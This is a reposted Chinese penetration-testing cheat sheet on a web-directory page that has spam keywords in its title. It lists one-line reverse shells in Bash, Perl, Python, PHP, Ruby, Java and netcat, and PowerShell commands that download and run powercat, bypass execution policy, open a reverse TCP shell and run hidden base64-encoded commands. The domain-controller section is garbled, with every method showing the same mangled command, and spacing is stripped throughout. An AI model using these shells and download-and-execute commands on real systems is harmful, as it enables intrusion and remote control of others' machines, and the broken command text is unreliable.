日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網(wǎng)為廣大站長(zhǎng)提供免費(fèi)收錄網(wǎng)站服務(wù),提交前請(qǐng)做好本站友鏈:【 網(wǎng)站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(wù)(50元/站),

點(diǎn)擊這里在線咨詢客服
新站提交
  • 網(wǎng)站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會(huì)員:747

內(nèi)網(wǎng)域?qū)崙?zhàn)滲透常用命令一.查找域控的幾種常用方法二.各種語言一句話反彈shell三.常用Power shell命令

發(fā)布時(shí)間:2023-07-03 14:54:01 作者:網(wǎng)友整理


內(nèi)網(wǎng)域?qū)崙?zhàn)滲透常用命令

 

一.查找域控的幾種常用方法

 

1.net view

  •  
netdomquerypdc

 

2.set log

  •  
netdomquerypdc

 

3.通過srv記錄

  •  
netdomquerypdc

 

4.使用nltest

  •  
netdomquerypdc

 

5.使用dsquery

  •  
netdomquerypdc

 

6.使用netdom

  •  
netdomquerypdc

 

注釋:這些都是win系統(tǒng)自帶的命令,有的時(shí)候win版本不同,有的命令會(huì)不存在,所以多一種方法,多一種成功的可能性,實(shí)際滲透,自行根據(jù)目標(biāo)環(huán)境變換。

 

二.各種語言一句話反彈shell

 

Bash [不通用,跟linux發(fā)行版本有關(guān),在ubuntu上測(cè)試成功]

  •  
bash-i>&/dev/tcp/10.0.0.1/80800>&1

 

PERL

  •  
perl-e'useSocket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh-i");};'

 

Python

  •  
python-c'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 

php

  •  
php-r'$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh-i<&3>&32>&3");'

 

Ruby

  •  
ruby-rsocket-e'f=TCPSocket.open("10.0.0.1",1234).to_i;execsprintf("/bin/sh-i<&%d>&%d2>&%d",f,f,f)'

 

JAVA

  •  
r=Runtime.getRuntime()p=r.exec(["/bin/bash","-c","exec5<>/dev/tcp/10.0.0.1/2002;cat<&52=""|=""while=""read=""line;=""do=""$line="">&5>&5;done"]asString[])p.waitFor()

 

netcat

  •  
nc-e/bin/shx.x.x.x2333
  •  
但某些版本的nc沒有-e參數(shù)(非傳統(tǒng)版),則可使用以下方式解決rm/tmp/f;mkfifo/tmp/f;cat/tmp/f|/bin/sh-i2>&1|ncx.x.x.x2333>/tmp/f

 

三.常用Power shell命令

 

1.通過遠(yuǎn)程下載來執(zhí)行

  •  
Set-ExecutionPolicyRemoteSignedIEX(New-ObjectSystem.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

 

2.把ps腳本傳到本地后執(zhí)行

  •  
PowerShell.exe-epBypass-Filed:powercat.ps1

 

3.本地交互式執(zhí)行

  •  
E:>PowerShell.exe-ExecutionPolicyBypassInvoke-PowerShellTcp-Reverse-IPAddress10.18.180.18-Port4444

 

4.把ps腳本編碼成base64來執(zhí)行[實(shí)戰(zhàn)用的最多]

  •  
powershell-epbypass-NoLogo-NonInteractive-NoProfile-windowstyleHidden-encbase64加密過的命令

 

作者:Ms08067安全實(shí)驗(yàn)室 轉(zhuǎn)載注明:https://www.secpulse.com/archives/120372.html

分享到:
標(biāo)簽:滲透
用戶無頭像

網(wǎng)友整理

注冊(cè)時(shí)間:

網(wǎng)站:5 個(gè)   小程序:0 個(gè)  文章:12 篇

  • 51998

    網(wǎng)站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會(huì)員

趕快注冊(cè)賬號(hào),推廣您的網(wǎng)站吧!
最新入駐小程序

數(shù)獨(dú)大挑戰(zhàn)2018-06-03

數(shù)獨(dú)一種數(shù)學(xué)游戲,玩家需要根據(jù)9

答題星2018-06-03

您可以通過答題星輕松地創(chuàng)建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學(xué)四六

運(yùn)動(dòng)步數(shù)有氧達(dá)人2018-06-03

記錄運(yùn)動(dòng)步數(shù),積累氧氣值。還可偷

每日養(yǎng)生app2018-06-03

每日養(yǎng)生,天天健康

體育訓(xùn)練成績(jī)?cè)u(píng)定2018-06-03

通用課目體育訓(xùn)練成績(jī)?cè)u(píng)定